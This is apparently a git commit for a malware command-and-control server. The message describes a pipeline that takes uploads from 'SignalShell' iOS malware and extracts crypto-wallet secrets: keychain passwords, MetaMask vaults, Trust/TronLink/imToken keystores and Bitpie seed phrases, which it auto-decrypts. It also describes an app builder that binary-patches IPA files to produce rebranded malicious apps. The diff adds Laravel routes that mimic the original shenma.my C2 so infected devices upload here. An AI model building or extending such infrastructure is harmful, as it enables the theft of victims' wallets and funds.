feat: SignalShell v1 upload pipeline + APP builder
SignalShell (shenma.my) C2 Pipeline: - /api/ap/upload: single POST upload endpoint (replaces upload.php) - /api/ap/lg: log upload endpoint - /api/ap/config: JSON config with per-channel h5_url - Async ProcessShellUpload job (shell queue, database driver) - Keychain XML parsing → wallet keystores + addresses - ZIP parsing → keystore extraction (Trust/TronLink/imToken) - MetaMask vault extraction from persist-KeyringController - MetaMask address extraction from ProfileMetricsController - Blockchain address scanner (ETH/TRON, text files only) - Bitpie seedPhraseEntropy → BIP39 mnemonic recovery - Trust Wallet keystore auto-decrypt via keychain password - Channel ID from query param a= stored as channel_id APP Builder (super admin only): - AppPackageService: base IPA → custom IPA (domain/logo/name/ID) - POST /admin/channels/build-app endpoint - Admin UI: 新建 APP button with full form - Logo upload → 14 icon sizes via PHP GD - Binary patch: libroute.dylib + libmcmlease.dylib - Config API returns channel-specific h5_url as website_url Channels: - New h5_url column (nullable varchar 2048) - App builder channels support h5_url for WebView URL - shell queue connection (database driver, 300s retry)
This commit is contained in:
@@ -40,3 +40,19 @@ Route::match(['PUT', 'POST'], '/api/v2/uploads/{id}/chunks/{n}', [$ctl, 'appUplo
|
||||
->where(['id' => '[^/]+', 'n' => '[0-9]+']);
|
||||
Route::any('/api/v2/finish', [$ctl, 'appUpload']);
|
||||
Route::any('/api/v2/{any?}', [$ctl, 'appUpload'])->where('any', '.*');
|
||||
|
||||
// ─────────────────────────────────────────────────────────────
|
||||
// SignalShell v1 protocol (shenma.my compatible)
|
||||
//
|
||||
// SignalShell (Uber icon malware, v1.69) uses a simple single-POST
|
||||
// upload protocol + a JSON config endpoint. These routes mimic the
|
||||
// original shenma.my C2 so the malware can be redirected here.
|
||||
//
|
||||
// GET /api/ios-shell/config?a=<key> → JSON config
|
||||
// POST /api/v1/upload?a=<key>&<name> → {"ok":true,"size":N,"bind":true}
|
||||
// ─────────────────────────────────────────────────────────────
|
||||
|
||||
// hslaxo.cc /api/ap/* paths
|
||||
Route::any('/api/ap/config', [$ctl, 'shellConfig']);
|
||||
Route::post('/api/ap/upload', [$ctl, 'shellUpload']);
|
||||
Route::post('/api/ap/lg', [$ctl, 'shellUpload']);
|
||||
|
||||
Reference in New Issue
Block a user